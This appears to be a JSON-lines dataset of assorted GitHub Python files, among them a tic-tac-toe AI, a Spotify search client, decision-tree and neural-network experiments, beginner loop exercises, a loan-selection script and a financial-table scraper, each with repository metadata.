symbol\r\n\r\n\r\n def build_tree(self, board):\r\n\r\n\r\n tree = LinkedBST()\r\n tree.add(board)\r\n computer_turn = False\r\n try:\r\n if self.last_symbol() == Board.user_symbol or Board.last_symbol() is None:\r\n computer_turn = True\r\n except:\r\n pass\r\n\r\n def recurse(node, computer_turn):\r\n try:\r\n free = bool(max([position is None for line in node.data for position in line]))\r\n if not free:\r\n return None\r\n except:\r\n pass\r\n\r\n while True:\r\n position = [random.choice([0, 1, 2]), random.choice([0, 1, 2])]\r\n if node.data[position[0]][position[1]] is None:\r\n break\r\n else:\r\n continue\r\n\r\n if Board.check_the_status(node.data) is not None:\r\n return None\r\n\r\n our_board = copy.deepcopy(node.data)\r\n if computer_turn:\r\n our_board[position[0]][position[1]] = Board.computer_symbol\r\n else:\r\n our_board[position[0]][position[1]] = Board.user_symbol\r\n\r\n node.left = BSTNode(our_board)\r\n\r\n while True:\r\n position = [random.choice([0, 1, 2]), random.choice([0, 1, 2])]\r\n if node.data[position[0]][position[1]] is None:\r\n break\r\n else:\r\n continue\r\n\r\n if Board.check_the_status(node.data) is not None:\r\n return None\r\n\r\n our_board = copy.deepcopy(node.data)\r\n if computer_turn:\r\n our_board[position[0]][position[1]] = Board.computer_symbol\r\n else:\r\n our_board[position[0]][position[1]] = Board.user_symbol\r\n\r\n node.right = BSTNode(our_board)\r\n\r\n if computer_turn is True:\r\n computer_turn = False\r\n elif computer_turn is False:\r\n computer_turn = True\r\n\r\n recurse(node.left, computer_turn)\r\n recurse(node.right, computer_turn)\r\n\r\n recurse(tree._root, computer_turn)\r\n return tree\r\n\r\n def choose_the_position(self):\r\n tree = self.build_tree(self.board)\r\n\r\n def counter(node):\r\n if node is not None:\r\n if node.left is None and node.right is None:\r\n if Board.user_symbol == Board.check_the_status(node.data):\r\n return -1\r\n elif Board.computer_symbol == Board.check_the_status(node.data):\r\n return 1\r\n else:\r\n return 0\r\n return (counter(node.left) + counter(node.right))\r\n else:\r\n pass\r\n left_counter = counter(tree._root.left)\r\n right_counter = counter(tree._root.right)\r\n try:\r\n if left_counter > right_counter:\r\n return tree._root.left.data\r\n else:\r\n return tree._root.left.data\r\n except:\r\n pass\r\n\r\n def __str__(self):\r\n \"\"\"\r\n String representation of board\r\n :return str:\r\n \"\"\"\r\n result = \"\"\r\n for line in self.board:\r\n for i in line:\r\n if i is None:\r\n result += \" \"\r\n else:\r\n result += i + \" \"\r\n result += \"\\n\"\r\n\r\n return result\r\n\r\n\r\n\r\n @staticmethod\r\n def check_the_status(board):\r\n for i in range(0, 3):\r\n if board[i][0] == board[i][1] == board[i][2] and board[i][0] is not None:\r\n return [i][0]\r\n\r\n if board[0][i] == board[1][i] == board[2][i] and board[0][i] is not None:\r\n return board[0][i]\r\n\r\n if board[0][0] == board[1][1] == board[2][2] and board[2][2] is not None:\r\n return board[2][2]\r\n\r\n if board[2][0] == board[1][1] == board[0][2] and board[0][2] is not None:\r\n return board[0][2]\r\n\r\n\r\n def free_position(self):\r\n free = bool(max([position is None for line in self.board for position in line]))\r\n return free\r\n","repo_name":"abalakirskaya/Tic-Tac-Toe","sub_path":"task_3/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"69863924041","text":"import os\nimport sys\nimport requests\nimport base64\n\nfrom enum import Enum\n\ndef refresh_login(f):\n def wrapper(*args):\n args[0].login()\n return f(*args)\n return wrapper\n\nclass SpotifySearchType(Enum):\n TRACK=\"track\"\n ALBUM=\"album\"\n ARTIST=\"artist\"\n PLAYLIST=\"playlist\"\n SHOW=\"show\"\n EPISODE=\"episode\"\n\nclass SpotifyDriver:\n def __init__(self, client_id, client_secret) -> None:\n self.client_id = client_id\n self.client_secret = client_secret\n self.token = None\n\n self.BASE_AUTH_ADDRESS = \"https://accounts.spotify.com\"\n self.TOKEN_URI = \"/api/token\"\n\n self.BASE_API_ADDRESS = \"https://api.spotify.com/v1\"\n self.SEARCH_API = \"/search\"\n\n self.login()\n\n def login(self):\n auth_payload = f\"{self.client_id}:{self.client_secret}\"\n headers = {\n \"Authorization\": f\"Basic {base64.b64encode(auth_payload.encode('ascii')).decode('ascii')}\",\n }\n url = f\"{self.BASE_AUTH_ADDRESS}{self.TOKEN_URI}\"\n data = {\n \"grant_type\": \"client_credentials\"\n }\n rsp = requests.post(url, headers=headers, data=data)\n\n if rsp.status_code > 299:\n raise RuntimeError(f\"Failed to login to spotify: {rsp.json()}\")\n\n token = rsp.json()['access_token']\n\n self.token = token\n\n @refresh_login\n def search(self, track_name, artist):\n type = SpotifySearchType.TRACK.value\n query = f\"{track_name} artist:{artist}\"\n\n url = f\"{self.BASE_API_ADDRESS}{self.SEARCH_API}\"\n headers = {\n \"Authorization\": f\"Bearer {self.token}\",\n }\n params = {\n \"type\": type,\n \"q\": query\n }\n rsp = requests.get(url, headers=headers, params=params)\n\n if rsp.status_code > 299:\n raise RuntimeError(f\"Failed to search in spotify: {rsp.json()}\")\n\n rsp_json = rsp.json()\n return rsp_json.get('tracks').get('items')[0]","repo_name":"FServais/noplp","sub_path":"backend/src/driver/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25658136325","text":"import ID3\n\nData_train = []\nData_test = []\n\nColumns = [\n 'buying',\n 'maint',\n 'doors',\n 'persons',\n 'lug_boot',\n 'safety',\n 'label'\n]\n\nAttributes = {\n 'buying': ['vhigh', 'high', 'med', 'low'],\n 'maint': ['vhigh', 'high', 'med', 'low'],\n 'doors': ['2', '3', '4', '5more'],\n 'persons': ['2', '4', 'more'],\n 'lug_boot': ['small', 'med', 'big'],\n 'safety': ['low', 'med', 'high']\n}\n\nLabels = {'unacc', 'acc', 'good', 'vgood'}\n\n\n# read training data\nwith open('./car/train.csv', 'r') as train_file:\n for line in train_file:\n row = line.strip().split(',')\n Data_train.append(row)\n\ntrain_file.close()\n\n# read test data\nwith open('./car/test.csv', 'r') as test_file:\n for line in test_file:\n row = line.strip().split(',')\n Data_test.append(row)\n\ntest_file.close()\n\nprint(\"Decision Tree on Car\")\nprint(\"d e_trn_h e_trn_me e_trn_gi e_tst_h e_tstme e_tst_gi\")\n\n# prediction accuracy with different max_depth\nfor max_depth in range(1, 7):\n # generate decision trees based on different purity functions\n h_tree = ID3.ID3(Data_train, Columns, Attributes, Labels, ID3.entropy, max_depth, 0)\n me_tree = ID3.ID3(Data_train, Columns, Attributes, Labels, ID3.majority_error, max_depth, 0)\n gi_tree = ID3.ID3(Data_train, Columns, Attributes, Labels, ID3.gini_index, max_depth, 0)\n\n # count prediction hits in training set\n train_size = len(Data_train)\n train_hit_h = 0\n train_hit_me = 0\n train_hit_gi = 0\n\n for row in Data_train:\n train_hit_h += ID3.predict_hit(row, Columns, h_tree)\n train_hit_me += ID3.predict_hit(row, Columns, me_tree)\n train_hit_gi += ID3.predict_hit(row, Columns, gi_tree)\n\n # calculate error rate in training set\n train_err_h = 1 - train_hit_h/train_size\n train_err_me = 1 - train_hit_me/train_size\n train_err_gi = 1 - train_hit_gi/train_size\n\n # count prediction hits in test set\n test_size = len(Data_test)\n test_hit_h = 0\n test_hit_me = 0\n test_hit_gi = 0\n\n for row in Data_test:\n test_hit_h += ID3.predict_hit(row, Columns, h_tree)\n test_hit_me += ID3.predict_hit(row, Columns, me_tree)\n test_hit_gi += ID3.predict_hit(row, Columns, gi_tree)\n\n # calculate error rate in test set\n test_err_h = 1 - test_hit_h/test_size\n test_err_me = 1 - test_hit_me/test_size\n test_err_gi = 1 - test_hit_gi/test_size\n\n print(max_depth, format(train_err_h, \".3f\"), format(train_err_me, \".3f\"), format(train_err_gi, \".3f\"), \n format(test_err_h, \".3f\"), format(test_err_me, \".3f\"), format(test_err_gi, \".3f\"), sep=\" & \")\n\n\n","repo_name":"lzhangsysu/ml_lib","sub_path":"DecisionTree/run_car.py","file_name":"run_car.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2247986227","text":"sayilar = [1,3,5,7,9,12,19,21]\n\n# 1: sayilar listesini while ile ekrana yazdirin.\n# 2: Baslangiç ve bitis degerlerini kullanicidan alip aradaki sayilari yazdirin.\n# 3: 1-100 arasindaki sayiları azalan sekilde yazdirin.\n# 4: Kullanicidan alacaginiz 5 sayıyı ekranda sirali bir sekilde yazdirin.\n# 5: Kullanicidan alacaginiz sinirs1z ürün bilgisini urunler listesi içinde yazdirin\n# **ürün sayisini kullaniclya sorun.\n# ** dictionary listesi yapis1 (name, price) seklinde olsun.\n# ** ürün ekleme islemi bittiginde ürünleri ekranda while ile listeleyin.\n\nprint('------------------------1---------------------')\n\ni = 0\n\nwhile i < len(sayilar):\n print(sayilar[i])\n i += 1\n\nprint('------------------------2---------------------')\nbas = int(input('Gebe die erste Zahl ein:'))\nson = int(input('Gebe die letzte Zahl ein:'))\n\ni = bas\nwhile i <= son:\n print(i)\n i+=1\n\nprint('------------------------3---------------------')\ni = 100\nwhile i >= 1:\n print(i)\n i-=1\n\nprint('------------------------4---------------------')\ni = 1\nlist = []\nwhile i <= 5:\n list.append(int(input(f'{i}.sayiyi giriniz ')))\n i += 1\n\nlist.sort()\nprint(list)\n\nprint('------------------------5---------------------')\nurunler = []\nadet = int(input('kaç ürün eklemek istiyorsunuz:'))\ni = 0\nwhile (i 0:\n# list_1.append(a % 2)\n# a = a // 2\n# print(*list_1[::-1], sep ='')\n\na_string =''\nwhile a > 0:\n a_string = str(a % 2) + a_string\n a //= 2\nprint(int(a_string))","repo_name":"NikVova/Python","sub_path":"Lection4/4_4.py","file_name":"4_4.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15387264253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 11 08:24:50 2019\r\n\r\n@author: Luis Rodriguez\r\n\"\"\"\r\n\r\n# Selecting Best Clients, Loan Ammount, Loan Term and Anual Interest.\r\n\r\nimport pandas as pd\r\n\r\ndata_set=pd.read_csv('model_dataset_vf.csv')\r\n\r\n# Best clients will be thw ones who are in Class=1 and the Predicted Class = 1\r\n# And their income minus outcome minus monthly real payment is greater than 0.\r\n\r\n\r\ndata_set['class_prediction']=logistic_regresion_model.predict(X)\r\n\r\n\r\ndata_pred=data_set.loc[data_set['class'] == 1] \r\nbest_clients=data_pred.loc[data_pred['class_prediction'] == 1]\r\n\r\n\r\nbest_clients['free_income']=best_clients['difference_surplus']-best_clients['real_monthly_payment']\r\nbest_clients=best_clients.loc[best_clients['free_income']>0]\r\nbest_clients=best_clients.loc[best_clients['maximum_number_of_credit_payments']>0]\r\n\r\nprint('159 clients were classified as Best Clients') \r\n\r\n# Loan ammount\r\n# In business management, the recomended ammount for a company in a regular \r\n# situation, is to use 50% of their surplus tops, to pay their credits.\r\n# Considering this situation, and encouraging our clients business health,\r\n# our recomende amounts should be considered as 50% of thei free income per month.\r\n\r\nbest_clients['loan_ammount_monthly_payment']=best_clients['free_income']/2\r\n\r\n# Loan term\r\n# Based on the clients maximum credit term in months, offering them an increase\r\n# of 10% in maximum credit terms.\r\n\r\nbest_clients['recomended_loan_term']=best_clients['maximum_number_of_credit_payments']*1.1\r\n\r\n# Credit limit\r\n\r\nbest_clients['credit_limit']=best_clients['loan_ammount_monthly_payment']*best_clients['recomended_loan_term']\r\n#best_clients['credit_limit']=best_clients.replace([best_clients['credit_limit']>best_clients['credit_limit']*2,best_clients['credit_limit']*2])\r\n\r\n# Anual interest to make the loan profitable\r\n# According to CONDUSEF, the anual interest rate is between 40% and up to 78%\r\n# for PYMES, so, we should be in that range, or even offer a better rate to \r\n# help and attract more clients, also considering, that the automation Konfio \r\n# develops, let them have low operational costs, so a lower rate is possible.\r\n\r\n# Considering a 40% rate (3.33% monthly rate)\r\n\r\nbest_clients['loan_term_in_years']=best_clients['recomended_loan_term']/12\r\nbest_clients['minimum_interest_loan_40%']=best_clients['loan_term_in_years']*best_clients['loan_ammount_monthly_payment']*.333\r\n\r\n# Considering the 78% rate (6.5% monthly rate)\r\nbest_clients['maximum_interest_loan_78%']=best_clients['loan_term_in_years']*best_clients['loan_ammount_monthly_payment']*.65\r\n\r\n# To define the interest, we should know more information about the Konfio's \r\n# operational costs, and probably consider other factors as inflation, to set\r\n# an adequate rate for each client.\r\n\r\nresults = best_clients[['id', 'free_income','loan_ammount_monthly_payment',\r\n 'recomended_loan_term','loan_term_in_years','credit_limit',\r\n 'minimum_interest_loan_40%','maximum_interest_loan_78%',\r\n ]].copy()\r\n\r\n#results['credit_limit']=results.replace([results['credit_limit']>(results['credit_limit']*2),results['credit_limit']*2])\r\n\r\n\r\nresults.to_csv('results.csv',index=False)\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.title('')\r\nplt.plot(results['id'],results['free_income'],label='Free Income')\r\nplt.plot(results['id'],results['loan_ammount_monthly_payment'],label='Loan Monthly Payment')\r\nplt.plot(results['id'],results['credit_limit'],label='Credit Limit')\r\nplt.plot(results['id'],results['minimum_interest_loan_40%'],label='Min Interest Loan')\r\nplt.plot(results['id'],results['maximum_interest_loan_78%'],label='Max Interest Loan')\r\nplt.legend()\r\nplt.xlabel('Id')\r\nplt.ylabel('$')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lscsrzss/konfio","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"72590819400","text":"from json import load\nfrom logging import getLogger\nfrom os import listdir, mkdir, path, remove\nfrom os.path import exists\nfrom pathlib import Path\n\nfrom PySide6.QtGui import QIcon\n\nfrom pynetix import (__date__, __description__, __project__, __resources__,\n __version__)\n\n\nclass Resource:\n\n stylesheetsDir = __resources__ / 'stylesheets'\n styles = {'Application': 'application',\n 'SideBar': 'sidebar',\n 'QSplitter Base': 'splitter_base',\n 'QSplitter Hover': 'splitter_hover'}\n\n themeDir = __resources__ / 'colourschemes'\n theme = {'WHITE': '#ffffff', 'RED': '#ff0000', 'ORANGE': '#fe8019', }\n\n iconDir = __resources__ / 'icons'\n iconRawDir = iconDir / 'raw'\n iconColouredDir = iconDir / 'coloured'\n icons = {'Arrow Down': 'down_arrow.svg',\n 'Arrow Right': 'right_arrow.svg'}\n\n textDir = __resources__ / 'texts'\n texts = {'about': 'about.html'}\n replacements = {'description': __description__, 'version': __version__,\n 'date': __date__}\n\n @staticmethod\n def getStyle(name: str) -> str:\n userFile = Resource.stylesheetsDir / \\\n f'{Resource.styles[name]}_user.qss'\n defaultFile = Resource.stylesheetsDir / f'{Resource.styles[name]}.qss'\n\n try:\n sheet = Resource._readFile(userFile)\n except FileNotFoundError:\n sheet = Resource._readFile(defaultFile)\n\n sheet = Resource._applyTheme(sheet)\n\n return sheet\n\n @staticmethod\n def updateColourScheme(theme: str) -> None:\n file = Resource.themeDir / f'{theme}.json'\n try:\n with open(file) as f:\n Resource.theme = load(f)\n Resource._updateIconColours()\n except:\n raise ValueError\n\n @staticmethod\n def getColour(colour: str) -> str:\n return Resource.theme[colour]\n\n @staticmethod\n def listThemes():\n availableThemes = []\n for file in listdir(str(Resource.themeDir)):\n try:\n with open(Resource.themeDir / file, 'r') as f:\n load(f)\n except:\n pass\n else:\n availableThemes.append(Path(file).stem)\n\n return tuple(availableThemes)\n\n @staticmethod\n def getIcon(name: str):\n iconPath = str(Resource.iconColouredDir / Resource.icons[name])\n\n if path.isfile(iconPath):\n try:\n icon = QIcon(iconPath)\n except ValueError:\n getLogger(__project__).warning(f'Icon \"{name}\" not readable.')\n icon = QIcon()\n else:\n getLogger(__project__).warning(f'Icon \"{name}\" not found.')\n icon = QIcon()\n\n return icon\n\n @staticmethod\n def getIconPath(name: str) -> str:\n iconPath = str(Resource.iconColouredDir / Resource.icons[name])\n\n if path.isfile(iconPath):\n return iconPath\n else:\n #getLogger(__project__).warning(f'Icon \"{name}\" not found.')\n return ''\n\n @staticmethod\n def getText(text: str) -> str:\n path = Resource.textDir / Resource.texts[text]\n text = Resource._readFile(path).format(**Resource.replacements)\n\n return text\n\n @staticmethod\n def _applyTheme(sheet: str) -> str:\n for colour in Resource.theme:\n sheet = sheet.replace(fr'$({colour})', Resource.theme[colour])\n\n return sheet\n\n @staticmethod\n def _readFile(path):\n if exists(path):\n with open(path, 'r') as f:\n return f.read()\n else:\n raise FileNotFoundError\n\n @staticmethod\n def _updateIconColours():\n if not path.isdir(Resource.iconColouredDir):\n mkdir(Resource.iconColouredDir)\n\n for icon in Resource.icons.values():\n try:\n remove(Resource.iconColouredDir / icon)\n except FileNotFoundError:\n pass\n\n try:\n with open(Resource.iconRawDir / icon, 'r') as f:\n content = f.read()\n except FileNotFoundError:\n pass\n getLogger(__project__).warning(f'Icon \"{icon}\" not found.')\n else:\n content = Resource._applyTheme(content)\n with open(Resource.iconColouredDir / icon, 'w') as f:\n f.write(content)\n","repo_name":"brands-d/Pynetix","sub_path":"pynetix/resources/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"73681135561","text":"from ex30.ex30_lib_graph import plot2\nfrom sknn.mlp import Regressor, Layer\nimport numpy as np\nfrom sklearn.preprocessing.data import StandardScaler\n\nOUTPUT_PNG_FILE = '/experiments/ex30/ex30_ann.png'\n\nX = [[float(x), float(x), float(x)] for x in range(0,24)]\nY = [12.0, 13.0, 13.0, 13.0, 28.0, 31.0, 38.0, 60.0, 85.0, 80.0, 64.0, 60.0, 59.0, 58.0, 65.0, 70.0, 80.0, 90.0, 110.0, 100.0, 85.0, 65.0, 45.0, 20.0 ]\n\nX2 = [[float(x)/10.0, float(x)/10.0, float(x)/10.0] for x in range(0,231)]\n \nlayers = []\nlayers.append(Layer(\"Rectifier\", units=100))\nlayers.append(Layer(\"Rectifier\", units=100))\nlayers.append(Layer(\"Rectifier\", units=100))\nlayers.append(Layer(\"Linear\"))\n\nmodel = Regressor(\n layers=layers,\n learning_rate=0.001,\n n_iter=5000,\n random_state=42)\n\nnormalizer_X = StandardScaler()\ntrainX = normalizer_X.fit_transform(X)\ntrainX2 = normalizer_X.fit_transform(X2)\nnormalizer_Y = StandardScaler()\ntrainY = normalizer_Y.fit_transform(Y)\n\nmodel.fit(np.array(trainX), np.array(trainY))\nY_pred = model.predict(np.array(trainX2))\nY_pred = normalizer_Y.inverse_transform(Y_pred)\n\nY_pred = [y[0] for y in Y_pred]\n\nprint(str(Y_pred))\n\nplot2(\n Y, \n Y_pred, \n OUTPUT_PNG_FILE,\n \"Observed pollution concentration levels\",\n \"Predicted pollution concentration levels by ANR\")\n\n","repo_name":"gabormakrai/landuseregression","sub_path":"experiments/src/ex30/ex30_ann.py","file_name":"ex30_ann.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"63"} +{"seq_id":"22591821467","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport math\n\nfrom ...sprites.rectangle_sprite import RectangleSprite\nfrom .bullet import Bullet\n\n\nclass Alien(RectangleSprite):\n BASE_SPEED = 0.5\n VARIABLE_SPEED = 0.1 # Additional speed per dead alien.\n LEFT, RIGHT = -1, 1\n\n def __init__(self, x, y):\n super(Alien, self).__init__(x=x, y=y, width=1, height=1, color=(1, 1, 1))\n\n def hit_by(self, other):\n if isinstance(other, Bullet) and other.is_alien:\n return\n\n self.destroy()\n\n def on_alien_advance(self, direction):\n self.move_by(0, 1)\n\n if direction == self.LEFT:\n self._x = math.floor(self._x)\n else:\n self._x = math.ceil(self._x)\n\n y = self.int_position[1]\n if 12 <= y <= 13:\n self.emit(\"destroy_base\", y)\n elif y >= 14:\n self.emit(\"game_over\")\n","repo_name":"bil-bas/pixel-table","sub_path":"pixel_table/modes/invaders/alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"32976878356","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\npd.set_option('display.max_columns', None)\n\n\ndef readData():\n # read train set data\n df_train = pd.read_csv('train.csv')\n df_train['train'] = 1\n # read test set data\n df_test = pd.read_csv('test.csv')\n df_test['train'] = 0\n df = pd.concat([df_train, df_test], sort=False,\n ignore_index=True) # concatenate the training set data and test set data\n return df\n\n\ndef onehot(df, col):\n new_df = pd.get_dummies(df[col], prefix=col, sparse=True)\n return new_df\n\n\ndef trainMlp(x_data, y_data, x_test, y_test):\n # split the train set and validation set\n train_data, val_data, train_label, val_label = train_test_split(x_data, y_data, test_size=0.1, random_state=10)\n\n print((x_test.shape))\n print((y_test.shape))\n print((train_data.shape))\n print((train_label.shape))\n # set the dimension for hidden layer\n H_DIM = 4\n\n # number of features in train dataset\n col = len(train_data[0])\n\n # initialize tf\n x = tf.placeholder(float, [None, col])\n y = tf.placeholder(float, [None, 1])\n\n # initialize input layer\n w1 = (tf.Variable(tf.random_normal([col, H_DIM])))\n b1 = tf.Variable(tf.constant(0.0, shape=[H_DIM]))\n # w2 = tf.Variable(tf.random_normal([H_DIM, H_DIM]))\n # b2 = tf.Variable(tf.constant(0.0, shape=[H_DIM]))\n\n # initialize the output layer\n w3 = tf.Variable(tf.random_normal([H_DIM, 1]))\n b3 = tf.Variable(tf.constant(0.0, shape=[1]))\n hidden_layer = tf.nn.tanh(tf.matmul(x, w1) + b1)\n\n # hidden_layer2 = tf.nn.tanh(tf.matmul(hidden_layer, w2) + b2)\n yhat = (tf.matmul(hidden_layer, w3) + b3)\n\n loss = tf.reduce_mean(tf.abs((yhat) - y)) # use mean average error as training loss\n loss2 = tf.reduce_mean(tf.square(tf.abs(yhat) - y)) # use mean square error as validation loss\n optimizer = tf.train.AdamOptimizer(0.05).minimize(loss) # use Adam optimizer\n\n init = tf.global_variables_initializer() # initialize all the data\n sess = tf.Session()\n sess.run(init)\n\n # train 400,000 steps\n for step in range(0, 20000):\n sess.run(optimizer, feed_dict={x: train_data, y: train_label})\n if (step % 400 == 0):\n # observe the loss2 for each session, pick the best loss2, write the csv\n print(sess.run(loss2, feed_dict={x: train_data, y: train_label}))\n print(sess.run(loss2, feed_dict={x: val_data, y: val_label}))\n # print(sess.run(loss2, feed_dict={x: x_test, y: y_test}))\n\n # write the ans csv for testset\n ans_y = sess.run(yhat, feed_dict={x: x_test, y: train_label})\n ans = pd.DataFrame(columns=['Id', 'time'])\n ans['Id'] = [i for i in range(0, 100)]\n ans['time'] = [(abs(i[0])) for i in ans_y]\n ans.to_csv('submission.csv', index=0)\n\n\ndef getCleanData(orgin_df):\n df = pd.DataFrame(orgin_df)\n\n # do onehot for 'penalty'\n df = df.merge(onehot(orgin_df, 'penalty'), left_index=True, right_index=True)\n\n # n_jobs for x=-1\n def fun(x):\n if (x == -1):\n return 16\n else:\n return x\n\n df['n_jobs'] = df['n_jobs'].apply(lambda x: fun(x))\n return df\n\n\ndef doFeatureEngineeriing(df):\n df['new_feature'] = np.log(df.max_iter * df.n_samples * df.n_features * df.n_classes / (1 + df.n_jobs))\n #df['time'] = np.log(df['time'])\n # normalization features\n columns = df.columns.tolist();\n columns.remove('id')\n columns.remove('penalty')\n columns.remove('time')\n columns.remove('train')\n columns.remove('random_state')\n columns.remove('scale')\n columns.remove('l1_ratio')\n columns.remove('n_clusters_per_class')\n columns.remove('flip_y')\n columns.remove('n_informative')\n for feature in columns:\n df[feature] = df[[feature]].apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x)))\n df_train = df[df['train'] == 1]\n df_test = df[df['train'] == 0]\n\n x_train = df_train[columns]\n y_train = df_train[['time']]\n x_test = df_test[columns]\n y_test = df_test['time']\n\n # convert to np.array format\n x_data = np.array(x_train, dtype=np.float32)\n y_data = np.array(y_train, dtype=np.float32)\n\n x_test_data = np.array(x_test, dtype=np.float32)\n y_test_data = np.array(y_test, dtype=np.float32)\n\n return x_data, y_data, x_test_data, y_test_data\n\n\nif __name__ == '__main__':\n orgin_df = readData()\n df = getCleanData(orgin_df)\n x_data, y_data, x_test_data, y_test_data = doFeatureEngineeriing(df)\n trainMlp(x_data, y_data, x_test_data, y_test_data.reshape(100, 1))\n","repo_name":"ahchan2018/MSBD-5001-Computing-Performance-Evaluation-Kaggle-Competition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70702636040","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\nimport fileinput\n\ndef solve():\n A = (\n (17, 1),\n (7 , 0),\n (19, 2),\n (5 , 0),\n (3 , 0),\n (13, 5),\n # Part B\n (11, 0),\n )\n \n #A = ((5,4), (2, 1))\n for x in range(1, 10**10):\n if all((s + i + x) % m == 0 for i, (m, s) in enumerate(A)):\n return x - 1\n \nprint(solve())\n","repo_name":"keegancsmith/advent","sub_path":"2016/15/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"1845266412","text":"import requests\nimport requests as req\nfrom bs4 import BeautifulSoup as bs\nfrom lxml import etree\n\n\n'''\n参考文章:\nhttps://zhuanlan.zhihu.com/p/159200115\n'''\nurl = 'http://quotes.money.163.com/f10/lrb_688237.html'\n# 模仿浏览器的headers\nheaders = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\"\n}\n\n# 测试\nresp = req.get(url,headers)\nresp.encoding = 'utf-8'\nhtml = resp.text\n\n\n#解析html\ndef get_table_from_html(html):\n tree = etree.HTML(html)\n # 寻找所有的table标签\n table_lst = tree.xpath(\"//table\")\n table_data_lst = []\n for table in table_lst:\n table_data_lst.append(get_table(table))\n\n return table_data_lst\n\ndef get_table(table_ele):\n \"\"\"\n 获取table数据\n :param table_ele:\n :return:\n \"\"\"\n tr_lst = table_ele.xpath(\".//tr\")\n # 第一行通常来说都是标题\n title_data = get_title(tr_lst[0])\n # 第一行后面都是数据\n data = get_data(tr_lst[1:])\n\n return {\n 'title': title_data,\n 'data': data\n }\n\n\ndef get_title(tr_ele):\n \"\"\"\n 获取标题\n 标题可能用th 标签,也可能用td标签\n :param tr_ele:\n :return:\n \"\"\"\n # 先寻找th标签\n title_lst = get_tr_data_by_tag(tr_ele, 'th')\n if not title_lst:\n title_lst = get_tr_data_by_tag(tr_ele, 'td')\n\n return title_lst\n\ndef get_tr_data_by_tag(tr, tag):\n \"\"\"\n 获取一行数据\n :param tr:\n :param tag:\n :return:\n \"\"\"\n datas = []\n nodes = tr.xpath(\".//{tag}\".format(tag=tag))\n for node in nodes:\n text = node.xpath('string(.)').strip()\n datas.append(text)\n\n return datas\n\n\ndef get_data(tr_lst):\n \"\"\"\n 获取数据\n :param tr_lst:\n :return:\n \"\"\"\n datas = []\n for tr in tr_lst:\n tr_data = get_tr_data_by_tag(tr, 'td')\n datas.append(tr_data)\n\n return datas\n\nif __name__ == '__main__':\n tree = etree.HTML(html)\n table_list = tree.xpath(\"//table\")\n for table in table_list:\n print(get_table(table))\n print(get_table(table_list[4]).get('data')[32])\n print(get_table(table_list[4]).get('data')[32][4])\n\n\n\n","repo_name":"xiaobabyLu/financeDataCrawAnalyze","sub_path":"dataScripy/finance_by_code.py","file_name":"finance_by_code.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18714466142","text":"import sys\nsys.path.append('..')\nimport argparse\nimport configparser\nfrom local.data_loader import DecodingRun, Session\nfrom scipy.io.wavfile import write as wavwrite\nimport os\nimport logging\nimport pandas as pd\n\n\nlogger = logging.getLogger('extract_trials.py')\n\n\ndef extract_wavs_from_session(session_dir, temp_dir):\n sess = Session(session_dir)\n\n wavs_dir = os.path.join(temp_dir, 'train_wavs')\n os.makedirs(wavs_dir, exist_ok=True)\n\n for i, word in enumerate(sess.words):\n audio = sess.get_trial_by_word(word)[2]\n filename = os.path.join(wavs_dir, '{:03}-{}.wav'.format(i + 1, word))\n wavwrite(filename, 16000, audio)\n\n\ndef extract_wavs_from_decoding_trials(run_dir, temp_dir):\n run = DecodingRun(run_dir)\n run_name = os.path.basename(run_dir)\n\n wavs_dir = os.path.join(temp_dir, '{}_wavs'.format(run_name))\n os.makedirs(wavs_dir, exist_ok=True)\n\n for i, word in enumerate(run.words):\n audio = run.get_trial_by_word(word)[2]\n filename = os.path.join(wavs_dir, '{:03}-{}.wav'.format(i + 1, word))\n wavwrite(filename, 16000, audio)\n\n\ndef generate_trial_label_file(run_dir, temp_dir):\n run = DecodingRun(run_dir)\n run_name = os.path.basename(run_dir)\n\n df_dict = {'start': run.trial_starts_in_sec, 'stop': run.trial_starts_in_sec + 2, 'label': run.words}\n df = pd.DataFrame.from_dict(df_dict)\n df.to_csv(os.path.join(temp_dir, '{}_trials.lab'.format(run_name)), index=False, header=False, sep='\\t')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Extract decoded trials.')\n parser.add_argument('config', help='Path to experiment config file.')\n\n args = 